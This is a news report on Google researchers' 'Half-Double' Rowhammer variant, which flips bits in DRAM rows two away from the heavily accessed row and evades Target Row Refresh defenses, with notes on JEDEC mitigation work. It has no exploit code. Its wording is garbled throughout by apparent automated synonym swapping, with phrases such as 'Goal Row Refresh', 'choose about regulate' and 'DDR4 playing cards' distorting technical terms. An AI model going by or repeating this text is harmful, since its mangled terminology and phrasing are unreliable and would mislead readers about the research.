A crew of security scientists from Google has shown but a further variant of the Rowhammer attack that bypasses all existing defenses to tamper with data saved in memory.
Dubbed “Half-Double,” the new hammering method hinges on the weak coupling among two memory rows that are not instantly adjacent to each and every other but one row taken off.
“Unlike TRRespass, which exploits the blind places of manufacturer-dependent defenses, Half-Double is an intrinsic assets of the underlying silicon substrate,” the scientists pointed out.
“This is most likely an sign that the electrical coupling dependable for Rowhammer is a property of distance, proficiently getting to be stronger and for a longer time-ranged as cell geometries shrink down. Distances larger than two are conceivable.”
Rowhammer attacks are related to speculative execution in that both split the fundamental security assures manufactured by the underlying hardware. Uncovered in 2014, Rowhammer refers to a class of DRAM vulnerabilities whereby repeated accesses to a memory row (“aggressor”) can induce an electrical disturbance large sufficient to flip bits stored in an adjacent row (“victim”), therefore enabling untrusted code to escape its sandbox and choose about regulate of the process.
Though DRAM brands deployed countermeasures like Goal Row Refresh (TRR) to thwart these kinds of attacks, the mitigations have been confined to two speedy neighbors of an aggressor row, consequently excluding memory cells at a two-row distance. The imperfect protections intended TRR defenses in DDR4 playing cards could be circumvented to phase new variants of Rowhammer assaults these types of as TRRespass and SMASH.
The distance-two assisted Rowhammer — aka Half-Double — now joins that checklist. “Presented a few consecutive rows A, B, and C, we have been equipped to attack C by directing a incredibly huge quantity of accesses to A, alongside with just a handful (~dozens) to B,” the scientists defined. In this new setup, A is the “significantly aggressor,” B is the “in the vicinity of aggressor,” and C is the “victim.”
Google mentioned it is at the moment doing work with the Joint Electron Device Engineering Council (JEDEC), an impartial standardization entire body and semiconductor engineering trade business, along with other business partners, to establish feasible remedies for Rowhammer exploits.
“To examine the performance of a [SoC-level] mitigation, a DRAM vendor really should test a mix of hammering distances alternatively than only tests at personal distances,” the researchers stated. “In other phrases, hammering a solitary row or a pair of sandwiching rows on the raw medium will not exhibit this impact. As an alternative, pairs of rows on one or both equally sides of an intended sufferer will need to be hammered.”